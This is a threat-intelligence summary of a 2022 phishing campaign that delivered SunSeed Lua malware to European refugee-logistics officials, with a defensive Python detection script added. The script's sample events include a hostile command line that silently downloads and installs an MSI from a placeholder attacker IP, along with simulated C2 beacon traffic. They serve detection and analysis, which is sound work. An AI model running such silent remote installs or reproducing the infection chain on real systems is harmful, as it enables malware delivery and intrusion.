Date: Feb 2022
Summary

A likely state-sponsored phishing campaign utilized compromised Ukrainian military personnel email accounts to target European government officials managing refugee logistics from Ukraine, delivering malicious macro-laden Excel attachments. The payload deployed SunSeed malware, a Lua-based downloader that established persistence and beaconed to command-and-control infrastructure to retrieve additional malicious code. This activity aligns with tactics of threat actor TA445, which operates from Belarus and historically conducts disinformation operations exploiting refugee movements to undermine NATO cohesion. The campaign aimed to gather intelligence on transportation, funding, and population flows, supporting hybrid warfare objectives by exacerbating anti-refugee sentiment and weakening Western support for Ukraine.

CIA Posture: Available to members
Motives: 3 motives (details available to members)
Tactics, Techniques & Procedures: 1 technique (details available to members)
Threat Actors: 0 actors
Type: Available to members
Location: Available to members

Description

On February 24, 2022, Proofpoint identified a phishing campaign originating from a compromised Ukrainian military email account (ukr[.]net domain) belonging to an individual associated with military unit A2622 in Ukraine’s Chernihiv region. The email leveraged social engineering tied to an Emergency Meeting of the NATO Security Council held the previous day, using the subject line "IN ACCORDANCE WITH THE DECISION OF THE EMERGENCY MEETING OF THE SECURITY COUNCIL OF UKRAINE DATED 24.02.2022." It contained a malicious macro-enabled Excel file ("list of persons.xlsx") designed to deploy SunSeed, a Lua-based malware.

When enabled, the macro executed a VB script that silently downloaded an MSI package from an actor-controlled IP via Windows Installer (msiexec.exe), suppressing user-interface alerts to conceal the activity. The MSI package installed modified legitimate components: a Windows Lua interpreter (sppsvc.exe) altered to hide console output, 12 Lua dependencies, and the SunSeed script ("print.lua"). Persistence was achieved through an LNK file placed in the Windows Startup directory, executing the malware upon system boot.

SunSeed functioned as a downloader, beaconing to a command-and-control (C2) server (84.32.188[.]96) every three seconds via HTTP GET requests. These requests appended the infected host’s C: drive partition serial number, potentially enabling victim tracking or selective payload delivery. The MSI package exhibited unusual characteristics, including Japanese Shift-JIS encoding in installation messages and creation using an outdated version (3.11.0.1528) of the WiX Toolset, last updated in 2017.
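Two of the behaviours above are cheap to hunt for in ordinary telemetry: an Office process spawning msiexec.exe with a remote package URL and a UI-suppression switch, and an endpoint issuing HTTP GETs to a single host at a fixed, very short interval. The following script is an added example written for this page, not Proofpoint's code or anything recovered from the SunSeed sample. The process events and proxy log lines are constructed, the C2 address is the documentation placeholder 203.0.113.10 rather than the IoC from the report, and the query-string format carrying the drive serial is an assumption (the report does not give it). The beacon check is written generally, so it flags any short, low-jitter GET cadence rather than only a three-second one.

```python
"""Detection sketches for the SunSeed infection chain described above (added
example, not the vendor's code).  Sample telemetry is constructed."""
import re
import statistics
from datetime import datetime

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Windows Installer switches that suppress the installer UI (/q, /qn, /qb,
# /quiet, /passive); msiexec accepts both "/" and "-" as the switch prefix.
QUIET_SWITCH = re.compile(r"(?i)(?:^|\s)[/-](?:q[nb]?|quiet|passive)(?=\s|$)")
REMOTE_PACKAGE = re.compile(r"(?i)\b(?:https?|ftp)://\S+")


def suspicious_msiexec(event):
    """True when an Office parent launches msiexec.exe with a remote package
    and a quiet switch, i.e. the macro -> silent remote MSI install chain."""
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["command_line"]
    return (parent in OFFICE_PARENTS and image == "msiexec.exe"
            and bool(REMOTE_PACKAGE.search(cmd)) and bool(QUIET_SWITCH.search(cmd)))


def beacon_candidates(proxy_lines, min_requests=5, max_interval=60.0, max_jitter=0.25):
    """Group GET requests per (source, host) and flag pairs whose inter-request
    gap is short (<= max_interval seconds) and nearly constant.  max_jitter is
    the tolerated coefficient of variation (stdev / mean) of the gaps.
    Expected line format (constructed): '<iso-timestamp> <src> <method> <url>'."""
    by_pair = {}
    for line in proxy_lines:
        ts, src, method, url = line.split()[:4]
        if method != "GET":
            continue
        host = url.split("/")[2]  # 'http://host/path' -> 'host'
        by_pair.setdefault((src, host), []).append(datetime.fromisoformat(ts))
    hits = []
    for (src, host), times in by_pair.items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0 or mean > max_interval:
            continue
        jitter = statistics.pstdev(gaps) / mean
        if jitter <= max_jitter:
            hits.append({"src": src, "host": host, "count": len(times),
                         "interval": round(mean, 2)})
    return hits


# Constructed process-creation events (Sysmon-style fields, not real telemetry).
SAMPLE_PROCESS_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec.exe /i http://203.0.113.10/pkg.msi /qn"},
    {"parent_image": r"C:\Windows\explorer.exe",  # benign local install
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec.exe /i C:\Users\u\Downloads\tool.msi"},
]

# Constructed proxy log: six GETs three seconds apart to the placeholder C2,
# carrying an assumed serial-number parameter, plus ordinary intranet browsing.
SAMPLE_PROXY_LOG = [
    f"2022-02-24T10:00:{s:02d} 10.0.0.5 GET http://203.0.113.10/?id=DEADBEEF"
    for s in range(0, 18, 3)
] + [
    "2022-02-24T10:00:01 10.0.0.5 GET http://intranet.example/home",
    "2022-02-24T10:02:47 10.0.0.5 GET http://intranet.example/news",
    "2022-02-24T10:09:12 10.0.0.5 GET http://intranet.example/home",
    "2022-02-24T10:09:15 10.0.0.5 POST http://intranet.example/login",
]

if __name__ == "__main__":
    for ev in SAMPLE_PROCESS_EVENTS:
        print("SUSPICIOUS" if suspicious_msiexec(ev) else "ok        ", ev["command_line"])
    for hit in beacon_candidates(SAMPLE_PROXY_LOG):
        print("beacon candidate:", hit)
```

The process check is deliberately narrow (Office parent, remote URL, quiet switch together) so that routine administrative msiexec use does not fire; widen OFFICE_PARENTS to cover whatever document readers your estate uses. The beacon check keys only on timing regularity, so it also catches the same implant if the C2 address changes, which is the property worth having given that this campaign reused tooling from July 2021.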


The campaign targeted European government personnel responsible for refugee transportation, budget allocation, and population movement logistics, indicating an intelligence-gathering objective aligned with monitoring refugee flows from Ukraine. Proofpoint linked the activity temporally and thematically to phishing campaigns reported by Ukrainian CERT-UA and SSSCIP between February 21-25, 2022, which warned of mass compromises of Ukrainian military personnel accounts by UNC1151 (tracked by Proofpoint as TA445).

While definitive attribution was not established, Proofpoint noted overlaps with TA445’s historical operations, including the use of compromised accounts, targeting of NATO governments, and focus on refugee-related disinformation. Technical parallels were observed with a July 2021 campaign employing nearly identical macros, MSI package construction via the same WiX version, and Lua malware beaconing drive serial numbers. TA445, assessed to operate from Belarus, has historically conducted hybrid warfare operations blending cyber intrusions with disinformation to amplify anti-refugee sentiment and strain NATO cohesion. The incident occurred amid the Russia-Ukraine conflict, reflecting a broader pattern of exploiting compromised Ukrainian assets to target entities involved in Western humanitarian or logistical responses.

Sources: 1 source (available to members)